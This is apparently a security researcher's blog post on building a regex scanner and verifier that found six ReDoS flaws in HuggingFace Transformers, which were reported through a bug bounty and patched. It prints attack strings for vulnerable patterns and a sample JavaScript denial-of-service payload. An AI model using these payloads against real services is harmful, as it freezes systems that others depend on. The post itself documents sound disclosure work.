6 CVEs and $750: Automating ReDoS Vulnerability Discovery with AI

The idea started while browsing Huntr’s hacktivity feed. I saw a ReDoS vulnerability reported in HuggingFace Transformers and wondered how many more might be hiding in there. Manually reviewing regex patterns sounded tedious and I only have the attention span of a Skink, so naturally I spent time building a tool to avoid doing it myself. That laziness paid off — 6 CVEs and $750, to be exact.

What Even is ReDoS?

Before we dive in, let me explain what ReDoS (Regular Expression Denial of Service) is for the uninitiated.

Regular expressions (regex) are those cryptic strings that look like your cat walked across your keyboard, but they’re actually incredibly useful for pattern matching. The problem? Some regex patterns are written in ways that cause the regex engine to go on an existential crisis when given certain inputs.

Here’s a classic evil regex:

pattern = r'(a+)+$'

I mean, what could go wrong here? Try matching this against the string "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" and watch your CPU scream for mercy.

What happens is catastrophic backtracking — the regex engine tries to match the pattern, fails, backtracks, tries again, fails, backtracks… you get the idea. The time complexity can be exponential, meaning a carefully crafted string can freeze your server for hours. Or forever.
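To put numbers on that blow-up, here is a minimal Python sketch that times the evil pattern above against progressively longer inputs. The helper name `time_match` and the input lengths are made up for illustration, and the lengths are deliberately small so the script finishes quickly.

```python
import re
import time

EVIL = re.compile(r'(a+)+$')


def time_match(n: int) -> float:
    """Seconds spent failing to match n 'a' characters followed by '!'."""
    subject = 'a' * n + '!'
    start = time.perf_counter()
    EVIL.match(subject)  # cannot succeed: the trailing '!' blocks '$'
    return time.perf_counter() - start


if __name__ == "__main__":
    # Small lengths only; every extra 'a' makes the failing match slower.
    for n in (14, 16, 18, 20):
        print(f"n={n:2d}  {time_match(n):.4f}s")
```

On a backtracking engine like Python's `re`, each extra `a` should roughly double the time, which is why the 31-character string above is already painful.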

The Grand Plan

I had this idea: what if I could automatically scan codebases for vulnerable regex patterns? Sounds simple enough, but regex parsing is surprisingly hard. There are ReDoS detection tools out there like redos-checker and recheck that tell you if a regex is vulnerable and even provide an attack string. I only needed some way to parse the regexes in the codebase and feed those into a detection tool.

So I did what any brain-rotted developer does in this Dystopian Intelligence Era — outsourced my thinking to ChatGPT.

Together, we built two main scripts:

1. The Scanner (`scanner.py`)

This script:

Walks through a project directory
Finds all Python and JavaScript/TypeScript files
Extracts regex patterns from functions like re.compile(), re.match(), re.findall(), new RegExp(), and literal /pattern/ syntax
Pipes each pattern through recheck
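The first three steps can be sketched roughly as follows. This is not the actual `scanner.py`: the function names, the extension list, and the simplified `PY_REGEX_CALL` pattern are assumptions made for illustration, it only handles single-line Python calls, and the recheck step is left out entirely.

```python
import os
import re
import sys
from typing import Iterator, Tuple

# Assumed set of extensions for "Python and JavaScript/TypeScript files".
SOURCE_EXTENSIONS = ('.py', '.js', '.ts')

# Simplified stand-in extractor: single-line re.<func>('...') calls only.
PY_REGEX_CALL = re.compile(
    r"""re\.(?:compile|search|match|findall|finditer|split|fullmatch)\s*\(\s*[rRbB]*(['"])(.*?)\1"""
)


def iter_source_files(root: str) -> Iterator[str]:
    """Yield paths under root whose extension looks like Python or JS/TS."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(SOURCE_EXTENSIONS):
                yield os.path.join(dirpath, name)


def extract_python_patterns(path: str) -> Iterator[Tuple[int, str]]:
    """Yield (line number, pattern text) for each regex call found in a file."""
    with open(path, encoding='utf-8', errors='replace') as handle:
        for lineno, line in enumerate(handle, start=1):
            for match in PY_REGEX_CALL.finditer(line):
                yield lineno, match.group(2)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else '.'
    for path in iter_source_files(root):
        if path.endswith('.py'):
            for lineno, pattern in extract_python_patterns(path):
                print(f"{path}:{lineno}: {pattern}")
```

Each extracted pattern would then be handed to the detection tool, which is the part this sketch skips.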

Here’s a snippet of the regex extraction logic for Python (the actual script is about 350 lines):

# Find re.compile() patterns
compile_pattern = r're\.compile\s*\(\s*([rfb]?[\'\"]{1,3}.*?[\'\"]{1,3})\s*(?:,\s*(?:re\.)?([A-Z|\s\|]*))?\s*\)'

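# Find re.search(), re.match(), etc.
re_funcs = r'(?:search|match|findall|finditer|split|fullmatch)'
# Raw f-string with doubled braces: a bare {1,3} inside an f-string is formatted as the tuple (1, 3)
re_func_pattern = rf're\.{re_funcs}\s*\(\s*([rfb]?[\'\"]{{1,3}}.*?[\'\"]{{1,3}})'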

Yes, I’m using regex to find regex. We’ve gone full inception. Leonardo DiCaprio would be proud.
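To see what that extraction actually captures, here is a small sketch that runs the `compile_pattern` regex from the snippet over a made-up piece of source code. The sample source and the `find_compile_calls` helper are hypothetical; only the pattern itself comes from the snippet.

```python
import re

# Copied verbatim from the snippet above.
compile_pattern = r're\.compile\s*\(\s*([rfb]?[\'\"]{1,3}.*?[\'\"]{1,3})\s*(?:,\s*(?:re\.)?([A-Z|\s\|]*))?\s*\)'

# Made-up source text to scan.
sample_source = r'''
import re
TAG = re.compile(r'<.*?>')
EVIL = re.compile(r'(a+)+$', re.IGNORECASE)
'''


def find_compile_calls(source: str):
    """Return (pattern literal, flags) pairs; flags is '' when no flag is given."""
    return re.findall(compile_pattern, source)


if __name__ == "__main__":
    for literal, flags in find_compile_calls(sample_source):
        print(f"literal={literal}  flags={flags or '(none)'}")
```

The first capture group holds the quoted literal including its prefix, and the second holds the flag name if there is one. A regex-based extractor like this only sees string literals written directly inside the call, so a pattern passed in through a variable is not picked up.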

2. The Verifier (`verify.py`)

The scanner can have false positives, so the verifier script:

Parses the scanner output
Takes each “vulnerable” pattern and its attack string
Actually runs the attack in a controlled environment using Node.js
If the regex takes longer than 10 seconds to execute — boom, confirmed vulnerability
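The timeout check can be sketched like this. Note the swap: the real verifier runs the attack in Node.js, while this sketch uses a Python child process and Python's `re` engine, so results will not necessarily carry over between engines. The names `CHILD_CODE` and `exceeds_timeout` are hypothetical.

```python
import subprocess
import sys

# Child program: read the attack string from stdin and run the search.
# stdin is used instead of argv so very long attack strings still fit.
CHILD_CODE = "import re, sys; re.search(sys.argv[1], sys.stdin.read())"


def exceeds_timeout(pattern: str, attack: str, timeout_s: float = 10.0) -> bool:
    """Return True if matching did not finish within timeout_s seconds."""
    try:
        subprocess.run(
            [sys.executable, "-c", CHILD_CODE, pattern],
            input=attack,
            text=True,
            timeout=timeout_s,
            check=True,  # an invalid pattern raises CalledProcessError instead
        )
    except subprocess.TimeoutExpired:
        return True  # subprocess.run kills the child before re-raising
    return False


if __name__ == "__main__":
    print(exceeds_timeout(r'(a+)+$', 'a' * 40 + '!', timeout_s=2.0))
    print(exceeds_timeout(r'^a+$', 'a' * 40, timeout_s=2.0))
```

Running the match in a separate process is the point of the design: a regex stuck in backtracking cannot be interrupted from inside the same thread, but a child process can simply be killed when the timer runs out.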

The Hunt: Transformers Edition

With my shiny new scanner ready, I needed a target. HuggingFace’s Transformers library was perfect:

Huge codebase with tons of regex
Critical infrastructure for the AI/ML community
Covered by Huntr.com’s bug bounty program

I pointed my scanner at the Transformers repo and let it rip:

$ python3 scanner.py transformers/ | tee scan-result-transformers.txt

Found 1049 regex pattern(s) in 397 file(s):
# ... rest of the 8000 lines of the output ...

$ python3 verify.py scan-result-transformers.txt

Found 38 potentially vulnerable patterns

Testing regex: /<.*?>/
Attack string: '<'.repeat(54773) + '\n<>'

[VULNERABLE] Pattern took longer than 10 seconds to complete

--------------------------------------------------------------------------------

Testing regex: /config\.(.*)\.json/
Attack string: 'jsonconfig.f'.repeat(15812) + 'json'

[VULNERABLE] Pattern took longer than 10 seconds to complete

--------------------------------------------------------------------------------
# ... more patterns tested ...

The feeling of seeing [VULNERABLE] pop up in red after a 10-second hang was oddly satisfying. The laziness indeed paid off.

A few minutes later, I had a treasure map of vulnerable patterns. Out of all the findings, I selected and verified 6 distinct vulnerabilities with real impact potential. Now came the tedious part — writing up reports on Huntr for each of them😵‍💫.

The Vulnerabilities

Here’s what I found:

| CVE | Location | Pattern | Report |
| --- | --- | --- | --- |
| CVE-2025-3263 | `configuration_utils.py` | `config\.(.*)\.json` | Report link |
| CVE-2025-3264 | `dynamic_module_utils.py` | Nested `try/except` blocks | Report link |
| CVE-2025-3933 | `processing_donut.py` | `<s_(.*?)>` | Report link |
| CVE-2025-5197 | `modeling_tf_pytorch_utils.py` | `/[^/]___([^/])/` | Report link |
| CVE-2025-6051 | `number_normalizer.py` | Long sequence of digits | Report link |
| CVE-2025-6638 | `tokenization_marian.py` | `>>.+<<` | Report link |

Each of these patterns could freeze a process when given a malicious input. In a production environment where Transformers is used to process user inputs (think chatbots, model loading from untrusted sources, etc.), these could be weaponized for Denial of Service attacks.

The Payday

I reported all 6 vulnerabilities through Huntr.com, which is like HackerOne but specifically for AI/ML and open source projects.

The process was smooth:

Submit the vulnerability report with PoC
Wait for triage (usually a few days)
Get confirmation and CVE assignment
💰

Final count:

6 vulnerabilities reported
6 CVEs assigned
$750 in bounties ($125 each)
1 very happy me

Not bad for a few hours of work. Although, let’s be honest, the real hours went into reporting the vulnerabilities. But that’s how it is.

Sample Attack

Here’s one of the simpler attack strings:

const regex = /config\.(.*)\.json/;
const payload = "jsonconfig.f".repeat(158120) + "json";

console.time("DoS");
payload.match(regex); // This will take FOREVER
console.timeEnd("DoS"); // label must match console.time(), otherwise no duration is printed

This is what it feels like to be a frozen server.
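Why does this payload hurt so much? Every `config.` in the string is a possible starting point. From each one, `(.*)` swallows the rest of the input and then backs off step by step looking for `.json`, which never shows up because every `.` in the payload is followed by `f`. That is roughly one long scan per starting point, so the work grows with the square of the input length rather than exponentially. Here is a scaled-down sketch of that growth, using Python's `re` instead of the JavaScript engine above; the helper name `time_search` and the repeat counts are made up for illustration.

```python
import re
import time

CONFIG_RE = re.compile(r'config\.(.*)\.json')


def time_search(repeats: int) -> float:
    """Seconds spent searching a payload built like the attack string above."""
    payload = 'jsonconfig.f' * repeats + 'json'
    start = time.perf_counter()
    CONFIG_RE.search(payload)  # never matches: there is no '.json' in the payload
    return time.perf_counter() - start


if __name__ == "__main__":
    # Small repeat counts so the script finishes quickly.
    for repeats in (250, 500, 1000, 2000):
        print(f"repeats={repeats:5d}  {time_search(repeats):.3f}s")
```

Doubling the repeat count should roughly quadruple the time, which is how a payload of a couple of megabytes turns into a very long hang.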

What I Learned

1. Automation is king. Manually auditing thousands of regex patterns would have taken weeks. The scanner did it in minutes.

2. AI is a force multiplier. ChatGPT helped me iterate on the scanner logic incredibly fast. It’s making us more effective (and a bit more dangerous). But AI is a double-edged sword: imagine Claude-generated code for critical features being shipped without proper testing.

3. Big projects have low-hanging fruit. You’d think a project maintained by a billion-dollar company would be squeaky clean. Nope. The attack surface is just too large.

4. ReDoS is underrated. It’s not as glamorous as RCE or SQLi, but when your ML inference server gets frozen because someone uploaded a sneaky model config file, you’ll wish you took regex security seriously.

The Tools

If you want to try this yourself, here’s what you need:

recheck — The ReDoS detection engine
A target — Pick any large open source project and go hunting
Patience — Not every finding is exploitable in practice

Closing Thoughts

This was a fun project. I got to combine my love for security research, automation, and AI while making some money on the side. The best part? Those 6 vulnerabilities are now patched, making Transformers safer for everyone who uses it.

Props to the HuggingFace team for quick fixes and being responsive throughout. And if you’re thinking of trying this yourself — go for it, there’s no shortage of targets.

If you’re interested in this kind of work, the barrier to entry is lower than you’d think. Some curiosity, a little patience, and a target — you’re already thinking all the time, why not put it into something like this?

Thanks for reading!